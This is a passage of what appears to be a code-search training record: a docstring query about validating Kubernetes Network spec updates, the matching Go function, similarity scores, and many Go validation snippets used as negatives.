\"default\",\n\t\t\tName: \"default\",\n\t\t\tNamespace: \"default\",\n\t\t},\n\t\tSpec: netproto.NetworkSpec{\n\t\t\tVlanID: 42,\n\t\t},\n\t}\n\n\t// make create network call\n\terr := ag.CreateNetwork(&nt)\n\tAssertOk(t, err, \"Error creating network\")\n\ttnt, err := ag.FindNetwork(nt.ObjectMeta)\n\tAssertOk(t, err, \"Network was not found in DB\")\n\tAssert(t, tnt.Spec.VlanID == 42, \"Network VLAN didn't match\", tnt)\n\n\t// verify duplicate network creations succeed\n\terr = ag.CreateNetwork(&nt)\n\tAssertOk(t, err, \"Error creating duplicate network\")\n\n\t// verify duplicate network name with different content does not succeed\n\tnnt := netproto.Network{\n\t\tTypeMeta: api.TypeMeta{Kind: \"Network\"},\n\t\tObjectMeta: api.ObjectMeta{\n\t\t\tTenant: \"default\",\n\t\t\tName: \"default\",\n\t\t\tNamespace: \"default\",\n\t\t},\n\t\tSpec: netproto.NetworkSpec{\n\t\t\tVlanID: 84,\n\t\t},\n\t}\n\terr = ag.CreateNetwork(&nnt)\n\tAssert(t, (err != nil), \"conflicting network creation succeeded\")\n\n\t// verify list api works\n\tnetList := ag.ListNetwork()\n\tAssert(t, len(netList) == 2, \"Incorrect number of networks\")\n\n\t// delete the network and verify its gone from db\n\terr = ag.DeleteNetwork(nt.Tenant, nt.Namespace, nt.Name)\n\tAssertOk(t, err, \"Error deleting network\")\n\t_, err = ag.FindNetwork(nt.ObjectMeta)\n\tAssert(t, err != nil, \"Network was still found in database after deleting\", ag)\n\n\t// verify you can not delete non-existing network\n\terr = ag.DeleteNetwork(nt.Tenant, nt.Namespace, nt.Name)\n\tAssert(t, err != nil, \"deleting non-existing network succeeded\", ag)\n}", "func validateRaw(conf *operv1.AdditionalNetworkDefinition) []error {\n\tout := []error{}\n\tvar rawConfig map[string]interface{}\n\tvar err error\n\n\tif conf.Name == \"\" {\n\t\tout = append(out, errors.Errorf(\"Additional Network Name cannot be nil\"))\n\t}\n\n\tconfBytes := []byte(conf.RawCNIConfig)\n\terr = json.Unmarshal(confBytes, &rawConfig)\n\tif err != nil {\n\t\tout = append(out, errors.Errorf(\"Failed to Unmarshal RawCNIConfig: %s\", string(confBytes)))\n\t}\n\n\treturn out\n}", "func (m *BaremetalSpecs) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateServerSpec(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (m *noneNetworkManager) VerifyNetworkOptions(_ context.Context) error {\n\t// No options to verify if no network settings are provided.\n\treturn nil\n}", "func NetworkPolicySpec() *NetworkPolicySpecApplyConfiguration {\n\treturn &NetworkPolicySpecApplyConfiguration{}\n}", "func (m *TunnelConfig) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateIPAddress(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateSharedSecret(formats); err != nil {\n\t\t// prop\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (in *VnetSpec) DeepCopy() *VnetSpec {\n\tif in == nil {\n\t\treturn nil\n\t}\n\tout := new(VnetSpec)\n\tin.DeepCopyInto(out)\n\treturn out\n}" ]
[ "0.67122936", "0.6589741", "0.65722126", "0.6494365", "0.6392701", "0.6391177", "0.6070578", "0.5993474", "0.59743595", "0.5910308", "0.5891103", "0.58672804", "0.5779491", "0.57532775", "0.574947", "0.5687439", "0.56747395", "0.5661901", "0.5616588", "0.5615219", "0.5526241", "0.55248016", "0.5501626", "0.54626995", "0.54405737", "0.54287285", "0.53996205", "0.53775597", "0.5343668", "0.5340415", "0.5336549", "0.52988064", "0.5248307", "0.5232505", "0.5231322", "0.52241874", "0.5216697", "0.5210021", "0.5202692", "0.5202519", "0.51926744", "0.51743996", "0.5164629", "0.5146297", "0.513931", "0.5122028", "0.51062596", "0.5104505", "0.5100451", "0.5098527", "0.50894135", "0.5077836", "0.50604767", "0.50572383", "0.50541294", "0.5050696", "0.5041538", "0.5039901", "0.50212604", "0.5017582", "0.50088197", "0.49832317", "0.49773988", "0.49773988", "0.49580336", "0.49492815", "0.4929306", "0.4927247", "0.4909655", "0.49066234", "0.48848966", "0.4882031", "0.48667967", "0.48509014", "0.48426694", "0.48424393", "0.48395985", "0.48320565", "0.48251143", "0.47981408", "0.4789964", "0.47779003", "0.47593707", "0.47557193", "0.4753234", "0.4746465", "0.4731529", "0.47220638", "0.47200873", "0.47200307", "0.46964976", "0.46908548", "0.46872887", "0.46826813", "0.46802634", "0.46722925", "0.46670327", "0.46629268", "0.46567178", "0.46542636" ]
0.7853857
0
ValidateNetworkSpecUpdate validates the spec of a Network object before an update.
func ValidateNetworkSpecUpdate(new, old *extensionsv1alpha1.NetworkSpec, deletionTimestampSet bool, fldPath *field.Path) field.ErrorList { allErrs := field.ErrorList{} if deletionTimestampSet && !apiequality.Semantic.DeepEqual(new, old) { allErrs = append(allErrs, apivalidation.ValidateImmutableField(new, old, fldPath)...) return allErrs } allErrs = append(allErrs, apivalidation.ValidateImmutableField(new.Type, old.Type, fldPath.Child("type"))...) allErrs = append(allErrs, apivalidation.ValidateImmutableField(new.PodCIDR, old.PodCIDR, fldPath.Child("podCIDR"))...) allErrs = append(allErrs, apivalidation.ValidateImmutableField(new.ServiceCIDR, old.ServiceCIDR, fldPath.Child("serviceCIDR"))...) return allErrs }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func ValidateNetworkUpdate(new, old *extensionsv1alpha1.Network) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\tallErrs = append(allErrs, apivalidation.ValidateObjectMetaUpdate(&new.ObjectMeta, &old.ObjectMeta, field.NewPath(\"metadata\"))...)\n\tallErrs = append(allErrs, ValidateNetworkSpecUpdate(&new.Spec, &old.Spec, new.DeletionTimestamp != nil, field.NewPath(\"spec\"))...)\n\tallErrs = append(allErrs, ValidateNetwork(new)...)\n\n\treturn allErrs\n}", "func (n *Network) ValidateUpdate(old runtime.Object) error {\n\tvar allErrors field.ErrorList\n\toldNetwork := old.(*Network)\n\n\tnetworklog.Info(\"validate update\", \"name\", n.Name)\n\n\t// shared validation rules with create\n\tallErrors = append(allErrors, n.Validate()...)\n\n\t// shared validation rules with create\n\tallErrors = append(allErrors, n.Spec.NetworkConfig.ValidateUpdate(&oldNetwork.Spec.NetworkConfig)...)\n\n\t// maximum allowed nodes with different name\n\tvar maxDiff int\n\t// all old nodes names\n\toldNodesNames := map[string]bool{}\n\t// nodes count in the old network spec\n\toldNodesCount := len(oldNetwork.Spec.Nodes)\n\t// nodes count in the new network spec\n\tnewNodesCount := len(n.Spec.Nodes)\n\t// nodes with different names than the old spec\n\tdifferentNodes := map[string]int{}\n\n\tif newNodesCount > oldNodesCount {\n\t\tmaxDiff = newNodesCount - oldNodesCount\n\t}\n\n\tfor _, node := range oldNetwork.Spec.Nodes {\n\t\toldNodesNames[node.Name] = true\n\t}\n\n\tfor i, node := range n.Spec.Nodes {\n\t\tif exists := oldNodesNames[node.Name]; !exists {\n\t\t\tdifferentNodes[node.Name] = i\n\t\t}\n\t}\n\n\tif len(differentNodes) > maxDiff {\n\t\tfor nodeName, i := range differentNodes {\n\t\t\terr := field.Invalid(field.NewPath(\"spec\").Child(\"nodes\").Index(i).Child(\"name\"), nodeName, \"field is immutable\")\n\t\t\tallErrors = append(allErrors, err)\n\t\t}\n\t}\n\n\tif len(allErrors) == 0 {\n\t\treturn nil\n\t}\n\n\treturn apierrors.NewInvalid(schema.GroupKind{}, n.Name, allErrors)\n\n}", "func ValidateNetworkSpec(spec *extensionsv1alpha1.NetworkSpec, fldPath *field.Path) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\tif len(spec.Type) == 0 {\n\t\tallErrs = append(allErrs, field.Required(fldPath.Child(\"type\"), \"field is required\"))\n\t}\n\n\tvar cidrs []cidrvalidation.CIDR\n\n\tif len(spec.PodCIDR) == 0 {\n\t\tallErrs = append(allErrs, field.Required(fldPath.Child(\"podCIDR\"), \"field is required\"))\n\t} else {\n\t\tcidrs = append(cidrs, cidrvalidation.NewCIDR(spec.PodCIDR, fldPath.Child(\"podCIDR\")))\n\t}\n\n\tif len(spec.ServiceCIDR) == 0 {\n\t\tallErrs = append(allErrs, field.Required(fldPath.Child(\"serviceCIDR\"), \"field is required\"))\n\t} else {\n\t\tcidrs = append(cidrs, cidrvalidation.NewCIDR(spec.ServiceCIDR, fldPath.Child(\"serviceCIDR\")))\n\t}\n\n\tallErrs = append(allErrs, cidrvalidation.ValidateCIDRParse(cidrs...)...)\n\tallErrs = append(allErrs, cidrvalidation.ValidateCIDROverlap(cidrs, cidrs, false)...)\n\n\treturn allErrs\n}", "func ValidateNetworkStatusUpdate(newStatus, oldStatus extensionsv1alpha1.NetworkStatus) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\treturn allErrs\n}", "func (m *AzureManagedControlPlane) validateVirtualNetworkUpdate(old *AzureManagedControlPlane) field.ErrorList {\n\tvar allErrs field.ErrorList\n\tif old.Spec.VirtualNetwork.Name != m.Spec.VirtualNetwork.Name {\n\t\tallErrs = append(allErrs,\n\t\t\tfield.Invalid(\n\t\t\t\tfield.NewPath(\"Spec\", \"VirtualNetwork.Name\"),\n\t\t\t\tm.Spec.VirtualNetwork.Name,\n\t\t\t\t\"Virtual Network Name is immutable\"))\n\t}\n\n\tif old.Spec.VirtualNetwork.CIDRBlock != m.Spec.VirtualNetwork.CIDRBlock {\n\t\tallErrs = append(allErrs,\n\t\t\tfield.Invalid(\n\t\t\t\tfield.NewPath(\"Spec\", \"VirtualNetwork.CIDRBlock\"),\n\t\t\t\tm.Spec.VirtualNetwork.CIDRBlock,\n\t\t\t\t\"Virtual Network CIDRBlock is immutable\"))\n\t}\n\n\tif old.Spec.VirtualNetwork.Subnet.Name != m.Spec.VirtualNetwork.Subnet.Name {\n\t\tallErrs = append(allErrs,\n\t\t\tfield.Invalid(\n\t\t\t\tfield.NewPath(\"Spec\", \"VirtualNetwork.Subnet.Name\"),\n\t\t\t\tm.Spec.VirtualNetwork.Subnet.Name,\n\t\t\t\t\"Subnet Name is immutable\"))\n\t}\n\n\t// NOTE: This only works because we force the user to set the CIDRBlock for both the\n\t// managed and unmanaged Vnets. If we ever update the subnet cidr based on what's\n\t// actually set in the subnet, and it is different from what's in the Spec, for\n\t// unmanaged Vnets like we do with the AzureCluster this logic will break.\n\tif old.Spec.VirtualNetwork.Subnet.CIDRBlock != m.Spec.VirtualNetwork.Subnet.CIDRBlock {\n\t\tallErrs = append(allErrs,\n\t\t\tfield.Invalid(\n\t\t\t\tfield.NewPath(\"Spec\", \"VirtualNetwork.Subnet.CIDRBlock\"),\n\t\t\t\tm.Spec.VirtualNetwork.Subnet.CIDRBlock,\n\t\t\t\t\"Subnet CIDRBlock is immutable\"))\n\t}\n\n\tif old.Spec.VirtualNetwork.ResourceGroup != m.Spec.VirtualNetwork.ResourceGroup {\n\t\tallErrs = append(allErrs,\n\t\t\tfield.Invalid(\n\t\t\t\tfield.NewPath(\"Spec\", \"VirtualNetwork.ResourceGroup\"),\n\t\t\t\tm.Spec.VirtualNetwork.ResourceGroup,\n\t\t\t\t\"Virtual Network Resource Group is immutable\"))\n\t}\n\treturn allErrs\n}", "func (r *Node) ValidateUpdate(old runtime.Object) error {\n\tvar allErrors field.ErrorList\n\toldNode := old.(*Node)\n\n\tnodelog.Info(\"validate update\", \"name\", r.Name)\n\n\tallErrors = append(allErrors, r.validate()...)\n\n\tif r.Spec.Network != oldNode.Spec.Network {\n\t\terr := field.Invalid(field.NewPath(\"spec\").Child(\"network\"), r.Spec.Network, \"field is immutable\")\n\t\tallErrors = append(allErrors, err)\n\t}\n\n\tif len(allErrors) == 0 {\n\t\treturn nil\n\t}\n\n\treturn apierrors.NewInvalid(schema.GroupKind{}, r.Name, allErrors)\n}", "func (a *AmazonEC2) ValidateCloudSpecUpdate(oldSpec kubermaticv1.CloudSpec, newSpec kubermaticv1.CloudSpec) error {\n\treturn nil\n}", "func (c *TestClusterGKE) ValidateUpdate(old runtime.Object) error {\n\to := old.(*TestClusterGKE)\n\tlog.V(1).Info(\"validate update\", \"namespace\", c.Namespace, \"name\", c.Name, \"new.Spec\", c.Spec, \"new.Status\", c.Status, \"old.Spec\", o.Spec, \"old.Status\", o.Status)\n\tif !equality.Semantic.DeepEqual(c.Spec, o.Spec) {\n\t\treturn errors.New(\"spec updates are not supported\")\n\t}\n\treturn nil\n}", "func (r *GCPMachineTemplate) ValidateUpdate(old runtime.Object) error {\n\toldGCPMachineTemplate := old.(*GCPMachineTemplate)\n\tif !reflect.DeepEqual(r.Spec, oldGCPMachineTemplate.Spec) {\n\t\treturn errors.New(\"gcpMachineTemplateSpec is immutable\")\n\t}\n\n\treturn nil\n}", "func (c *IPPool) ValidateUpdate(old runtime.Object) error {\n\tallErrs := field.ErrorList{}\n\toldM3ipp, ok := old.(*IPPool)\n\tif !ok || oldM3ipp == nil {\n\t\treturn apierrors.NewInternalError(errors.New(\"unable to convert existing object\"))\n\t}\n\n\tif !reflect.DeepEqual(c.Spec.NamePrefix, oldM3ipp.Spec.NamePrefix) {\n\t\tallErrs = append(allErrs,\n\t\t\tfield.Invalid(\n\t\t\t\tfield.NewPath(\"spec\", \"NamePrefix\"),\n\t\t\t\tc.Spec.NamePrefix,\n\t\t\t\t\"cannot be modified\",\n\t\t\t),\n\t\t)\n\t}\n\n\tif len(allErrs) == 0 {\n\t\treturn nil\n\t}\n\treturn apierrors.NewInvalid(GroupVersion.WithKind(\"Metal3Data\").GroupKind(), c.Name, allErrs)\n}", "func (s *SubnetSpec) shouldUpdate(existingSubnet network.Subnet) bool {\n\t// No modifications for non-managed subnets\n\tif !s.IsVNetManaged {\n\t\treturn false\n\t}\n\n\t// Update the subnet a NAT Gateway was added for backwards compatibility.\n\tif s.NatGatewayName != \"\" && existingSubnet.SubnetPropertiesFormat.NatGateway == nil {\n\t\treturn true\n\t}\n\n\t// Update the subnet if the service endpoints changed.\n\tif existingSubnet.ServiceEndpoints != nil || len(s.ServiceEndpoints) > 0 {\n\t\tvar existingServiceEndpoints []network.ServiceEndpointPropertiesFormat\n\t\tif existingSubnet.ServiceEndpoints != nil {\n\t\t\tfor _, se := range *existingSubnet.ServiceEndpoints {\n\t\t\t\texistingServiceEndpoints = append(existingServiceEndpoints, network.ServiceEndpointPropertiesFormat{Service: se.Service, Locations: se.Locations})\n\t\t\t}\n\t\t}\n\t\tnewServiceEndpoints := make([]network.ServiceEndpointPropertiesFormat, len(s.ServiceEndpoints))\n\t\tfor _, se := range s.ServiceEndpoints {\n\t\t\tse := se\n\t\t\tnewServiceEndpoints = append(newServiceEndpoints, network.ServiceEndpointPropertiesFormat{Service: ptr.To(se.Service), Locations: &se.Locations})\n\t\t}\n\n\t\tdiff := cmp.Diff(newServiceEndpoints, existingServiceEndpoints)\n\t\treturn diff != \"\"\n\t}\n\treturn false\n}", "func (in *KubeadmControlPlane) ValidateUpdate(old runtime.Object) error {\n\tallErrs := in.validateCommon()\n\n\tprev := old.(*KubeadmControlPlane)\n\tif !reflect.DeepEqual(in.Spec.KubeadmConfigSpec, prev.Spec.KubeadmConfigSpec) {\n\t\tallErrs = append(\n\t\t\tallErrs,\n\t\t\tfield.Forbidden(\n\t\t\t\tfield.NewPath(\"spec\", \"kubeadmConfigSpec\"),\n\t\t\t\t\"cannot be modified\",\n\t\t\t),\n\t\t)\n\t}\n\n\t// In order to make the kubeadm config spec mutable, please see https://github.com/kubernetes-sigs/cluster-api/pull/2388/files\n\n\tif len(allErrs) > 0 {\n\t\treturn apierrors.NewInvalid(GroupVersion.WithKind(\"KubeadmControlPlane\").GroupKind(), in.Name, allErrs)\n\t}\n\n\treturn nil\n}", "func (in *ManagedCluster) ValidateUpdate(old runtime.Object) error {\n\treturn nil\n}", "func (c *KubeadmConfig) ValidateUpdate(_ runtime.Object) (admission.Warnings, error) {\n\treturn nil, c.Spec.validate(c.Name)\n}", "func (z *Zamowienium) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func ValidateNetwork(network *extensionsv1alpha1.Network) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\tallErrs = append(allErrs, apivalidation.ValidateObjectMeta(&network.ObjectMeta, true, apivalidation.NameIsDNSSubdomain, field.NewPath(\"metadata\"))...)\n\tallErrs = append(allErrs, ValidateNetworkSpec(&network.Spec, field.NewPath(\"spec\"))...)\n\n\treturn allErrs\n}", "func (r *Unit) ValidateUpdate(old runtime.Object) error {\n\tunitlog.Info(\"validate update\", \"name\", r.Name)\n\n\t// TODO(user): fill in your validation logic upon object update.\n\treturn nil\n}", "func (cluster *Cluster) ValidateUpdate(old runtime.Object) error {\n\tklog.Info(\"validate update\", \"name\", cluster.Name)\n\treturn nil\n}", "func (webhook *VSphereFailureDomainWebhook) ValidateUpdate(_ context.Context, oldRaw runtime.Object, newRaw runtime.Object) (admission.Warnings, error) {\n\toldTyped, ok := oldRaw.(*infrav1.VSphereFailureDomain)\n\tif !ok {\n\t\treturn nil, apierrors.NewBadRequest(fmt.Sprintf(\"expected a VSphereFailureDomain but got a %T\", oldRaw))\n\t}\n\tnewTyped, ok := newRaw.(*infrav1.VSphereFailureDomain)\n\tif !ok {\n\t\treturn nil, apierrors.NewBadRequest(fmt.Sprintf(\"expected a VSphereFailureDomain but got a %T\", newRaw))\n\t}\n\tif !reflect.DeepEqual(newTyped.Spec, oldTyped.Spec) {\n\t\treturn nil, field.Forbidden(field.NewPath(\"spec\"), \"VSphereFailureDomainSpec is immutable\")\n\t}\n\treturn nil, nil\n}", "func (c *Contract) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (w *BareMetalDiscoveryWebhook) ValidateUpdate(obj runtime.Object, old runtime.Object) error {\n\tr := obj.(*baremetalv1alpha1.BareMetalDiscovery)\n\n\tbaremetaldiscoverylog.Info(\"validate update\", \"name\", r.Name)\n\toldBMD := old.(*baremetalv1alpha1.BareMetalDiscovery)\n\n\tvar allErrs field.ErrorList\n\n\t// Never allow changing system uuid\n\tif r.Spec.SystemUUID != oldBMD.Spec.SystemUUID {\n\t\tallErrs = append(allErrs, field.Forbidden(\n\t\t\tfield.NewPath(\"spec\").Child(\"systemUUID\"),\n\t\t\t\"Cannot change the discovery system uuid\",\n\t\t))\n\t}\n\n\t// never allow changing the hardware if it is already set\n\tif oldBMD.Spec.Hardware != nil && reflect.DeepEqual(r.Spec.Hardware, oldBMD.Spec.Hardware) == false {\n\t\tallErrs = append(allErrs, field.Forbidden(\n\t\t\tfield.NewPath(\"spec\").Child(\"hardware\"),\n\t\t\t\"Cannot change the discovery hardware\",\n\t\t))\n\t}\n\n\tif len(allErrs) == 0 {\n\t\treturn nil\n\t}\n\n\treturn apierrors.NewInvalid(\n\t\tschema.GroupKind{Group: baremetalv1alpha1.GroupVersion.Group, Kind: baremetalv1alpha1.BareMetalDiscoveryKind},\n\t\tr.Name, allErrs)\n}", "func (n *Network) Validate() field.ErrorList {\n\tvar validateErrors field.ErrorList\n\n\t// validate network config (id, genesis, consensus and join)\n\tvalidateErrors = append(validateErrors, n.Spec.NetworkConfig.Validate()...)\n\n\t// validate nodes\n\tvalidateErrors = append(validateErrors, n.ValidateNodes()...)\n\n\treturn validateErrors\n}", "func (l *Libvirt) NetworkUpdate(Net Network, Command uint32, Section uint32, ParentIndex int32, XML string, Flags NetworkUpdateFlags) (err error) {\n\tvar buf []byte\n\n\targs := NetworkUpdateArgs {\n\t\tNet: Net,\n\t\tCommand: Command,\n\t\tSection: Section,\n\t\tParentIndex: ParentIndex,\n\t\tXML: XML,\n\t\tFlags: Flags,\n\t}\n\n\tbuf, err = encode(&args)\n\tif err != nil {\n\t\treturn\n\t}\n\n\n\t_, err = l.requestStream(291, constants.Program, buf, nil, nil)\n\tif err != nil {\n\t\treturn\n\t}\n\n\treturn\n}", "func ValidateBackupEntrySpecUpdate(newSpec, oldSpec *core.BackupEntrySpec, fldPath *field.Path) field.ErrorList {\n\tallErrs := field.ErrorList{}\n\n\tallErrs = append(allErrs, apivalidation.ValidateImmutableField(newSpec.BucketName, oldSpec.BucketName, fldPath.Child(\"bucketName\"))...)\n\n\treturn allErrs\n}", "func (r *NodeDeployment) ValidateUpdate(old runtime.Object) error {\n\tnodedeploymentlog.Info(\"validate update\", \"name\", r.Name)\n\n\toldNodeDeployment, ok := old.DeepCopyObject().(*NodeDeployment)\n\tif !ok {\n\t\tnodedeploymentlog.Info(\"validate update DeepCopyObject error\")\n\t\treturn fmt.Errorf(\"do not support update operation\")\n\t}\n\tif oldNodeDeployment.Spec.Platform != r.Spec.Platform ||\n\t\toldNodeDeployment.Spec.EdgeNodeName != r.Spec.EdgeNodeName ||\n\t\toldNodeDeployment.Spec.NodeMaintenanceName != r.Spec.NodeMaintenanceName ||\n\t\toldNodeDeployment.Spec.ActionPolicy != r.Spec.ActionPolicy ||\n\t\toldNodeDeployment.Spec.KubeEdgeVersion != r.Spec.KubeEdgeVersion ||\n\t\toldNodeDeployment.Spec.CloudNodeIP != r.Spec.CloudNodeIP {\n\t\tfmt.Println(\"do not support update operation currently, if you want to update the object, please delete it first then re-create\")\n\t\treturn fmt.Errorf(\"do not support update operation\")\n\t} else {\n\t\treturn nil\n\t}\n}", "func (ruleset *DnsForwardingRuleset) ValidateUpdate(old runtime.Object) (admission.Warnings, error) {\n\tvalidations := ruleset.updateValidations()\n\tvar temp any = ruleset\n\tif runtimeValidator, ok := temp.(genruntime.Validator); ok {\n\t\tvalidations = append(validations, runtimeValidator.UpdateValidations()...)\n\t}\n\treturn genruntime.ValidateUpdate(old, validations)\n}", "func (net *NetworkUpdateInput) UpdateNetwork() (UpdateNetworkResponse, error) {\n\n\tif status := support.DoesCloudSupports(strings.ToLower(net.Cloud.Name)); status != true {\n\t\treturn UpdateNetworkResponse{}, fmt.Errorf(common.DefaultCloudResponse + \"UpdateNetwork\")\n\t}\n\n\tswitch strings.ToLower(net.Cloud.Name) {\n\tcase \"aws\":\n\n\t\tcreds, err := common.GetCredentials(\n\t\t\t&common.GetCredentialsInput{\n\t\t\t\tProfile: net.Cloud.Profile,\n\t\t\t\tCloud: net.Cloud.Name,\n\t\t\t},\n\t\t)\n\n\t\tif err != nil {\n\t\t\treturn UpdateNetworkResponse{}, err\n\t\t}\n\t\t// I will establish session so that we can carry out the process in cloud\n\t\tsession_input := awssess.CreateSessionInput{Region: net.Cloud.Region, KeyId: creds.KeyId, AcessKey: creds.SecretAccess}\n\t\tsess := session_input.CreateAwsSession()\n\n\t\t//authorizing to request further\n\t\tauthinpt := auth.EstablishConnectionInput{Region: net.Cloud.Region, Resource: \"ec2\", Session: sess}\n\n\t\t// I will call UpdateNetwork of interface and get the things done\n\t\tserverin := awsnetwork.UpdateNetworkInput{\n\t\t\tResource: net.Catageory.Resource,\n\t\t\tAction: net.Catageory.Action,\n\t\t\tGetRaw: net.Cloud.GetRaw,\n\t\t\tNetwork: awsnetwork.NetworkCreateInput{\n\t\t\t\tName: net.Catageory.Name,\n\t\t\t\tVpcCidr: net.Catageory.VpcCidr,\n\t\t\t\tVpcId: net.Catageory.VpcId,\n\t\t\t\tSubCidrs: net.Catageory.SubCidrs,\n\t\t\t\tType: net.Catageory.Type,\n\t\t\t\tPorts: net.Catageory.Ports,\n\t\t\t\tZone: net.Catageory.Zone,\n\t\t\t},\n\t\t}\n\t\tresponse, err := serverin.UpdateNetwork(authinpt)\n\t\tif err != nil {\n\t\t\treturn UpdateNetworkResponse{}, err\n\t\t}\n\t\treturn UpdateNetworkResponse{AwsResponse: response}, nil\n\n\tcase \"azure\":\n\t\treturn UpdateNetworkResponse{DefaultResponse: common.DefaultAzResponse}, nil\n\tcase \"gcp\":\n\t\treturn UpdateNetworkResponse{DefaultResponse: common.DefaultGcpResponse}, nil\n\tcase \"openstack\":\n\t\treturn UpdateNetworkResponse{DefaultResponse: common.DefaultOpResponse}, nil\n\tdefault:\n\t\treturn UpdateNetworkResponse{DefaultResponse: common.DefaultCloudResponse + \"NetworkUpdate\"}, nil\n\t}\n}", "func TestUpdateNetworkPolicy(t *testing.T) {\n\toldNetPolObj := createNetPol()\n\n\tfexec := exec.New()\n\tf := newNetPolFixture(t, fexec)\n\tf.netPolLister = append(f.netPolLister, oldNetPolObj)\n\tf.kubeobjects = append(f.kubeobjects, oldNetPolObj)\n\tstopCh := make(chan struct{})\n\tdefer close(stopCh)\n\tf.newNetPolController(stopCh)\n\n\tnewNetPolObj := oldNetPolObj.DeepCopy()\n\t// oldNetPolObj.ResourceVersion value is \"0\"\n\tnewRV, _ := strconv.Atoi(oldNetPolObj.ResourceVersion)\n\tnewNetPolObj.ResourceVersion = fmt.Sprintf(\"%d\", newRV+1)\n\n\tupdateNetPol(t, f, oldNetPolObj, newNetPolObj)\n\t// no need to reconcile because only the rv changes, so we don't see a prometheus update exec count\n\ttestCases := []expectedNetPolValues{\n\t\t{1, 0, true, netPolPromVals{1, 1, 0, 0}},\n\t}\n\tcheckNetPolTestResult(\"TestUpdateNetPol\", f, testCases)\n}", "func (m *PVMInstanceNetwork) Validate(formats strfmt.Registry) error {\n\treturn nil\n}", "func (g *Group) ValidateUpdate(tx *pop.Connection) (*validate.Errors, error) {\n\treturn validate.NewErrors(), nil\n}", "func (m *NodePoolUpdate) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateInstanceTypes(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (policy *ServersConnectionPolicy) ValidateUpdate(old runtime.Object) (admission.Warnings, error) {\n\tvalidations := policy.updateValidations()\n\tvar temp any = policy\n\tif runtimeValidator, ok := temp.(genruntime.Validator); ok {\n\t\tvalidations = append(validations, runtimeValidator.UpdateValidations()...)\n\t}\n\treturn genruntime.ValidateUpdate(old, validations)\n}", "func (m *Network) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateID(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateMasterInterface(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateType(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func (machine *VirtualMachine) ValidateUpdate(old runtime.Object) (admission.Warnings, error) {\n\tvalidations := machine.updateValidations()\n\tvar temp any = machine\n\tif runtimeValidator, ok := temp.(genruntime.Validator); ok {\n\t\tvalidations = append(validations, runtimeValidator.UpdateValidations()...)\n\t}\n\treturn genruntime.ValidateUpdate(old, validations)\n}", "func (r *OpenStackCluster) ValidateUpdate(oldRaw runtime.Object) (admission.Warnings, error) {\n\tvar allErrs field.ErrorList\n\told, ok := oldRaw.(*OpenStackCluster)\n\tif !ok {\n\t\treturn nil, apierrors.NewBadRequest(fmt.Sprintf(\"expected an OpenStackCluster but got a %T\", oldRaw))\n\t}\n\n\tif r.Spec.IdentityRef != nil && r.Spec.IdentityRef.Kind != defaultIdentityRefKind {\n\t\tallErrs = append(allErrs,\n\t\t\tfield.Invalid(field.NewPath(\"spec\", \"identityRef\", \"kind\"),\n\t\t\t\tr.Spec.IdentityRef, \"must be a Secret\"),\n\t\t)\n\t}\n\n\t// Allow changes to Spec.IdentityRef.Name.\n\tif old.Spec.IdentityRef != nil && r.Spec.IdentityRef != nil {\n\t\told.Spec.IdentityRef.Name = \"\"\n\t\tr.Spec.IdentityRef.Name = \"\"\n\t}\n\n\t// Allow changes to Spec.IdentityRef if it was unset.\n\tif old.Spec.IdentityRef == nil && r.Spec.IdentityRef != nil {\n\t\told.Spec.IdentityRef = &OpenStackIdentityReference{}\n\t\tr.Spec.IdentityRef = &OpenStackIdentityReference{}\n\t}\n\n\tif old.Spec.IdentityRef != nil && r.Spec.IdentityRef == nil {\n\t\tallErrs = append(allErrs,\n\t\t\tfield.Invalid(field.NewPath(\"spec\", \"identityRef\"),\n\t\t\t\tr.Spec.IdentityRef, \"field cannot be set to nil\"),\n\t\t)\n\t}\n\n\t// Allow change only for the first time.\n\tif old.Spec.ControlPlaneEndpoint.Host == \"\" {\n\t\told.Spec.ControlPlaneEndpoint = clusterv1.APIEndpoint{}\n\t\tr.Spec.ControlPlaneEndpoint = clusterv1.APIEndpoint{}\n\t}\n\n\t// Allow change only for the first time.\n\tif old.Spec.DisableAPIServerFloatingIP && old.Spec.APIServerFixedIP == \"\" {\n\t\tr.Spec.APIServerFixedIP = \"\"\n\t}\n\n\t// If API Server floating IP is disabled, allow the change of the API Server port only for the first time.\n\tif old.Spec.DisableAPIServerFloatingIP && old.Spec.APIServerPort == 0 && r.Spec.APIServerPort > 0 {\n\t\tr.Spec.APIServerPort = 0\n\t}\n\n\t// Allow changes to the bastion spec.\n\told.Spec.Bastion = &Bastion{}\n\tr.Spec.Bastion = &Bastion{}\n\n\t// Allow changes on AllowedCIDRs\n\tif r.Spec.APIServerLoadBalancer.Enabled {\n\t\told.Spec.APIServerLoadBalancer.AllowedCIDRs = []string{}\n\t\tr.Spec.APIServerLoadBalancer.AllowedCIDRs = []string{}\n\t}\n\n\t// Allow changes to the availability zones.\n\told.Spec.ControlPlaneAvailabilityZones = []string{}\n\tr.Spec.ControlPlaneAvailabilityZones = []string{}\n\n\tif 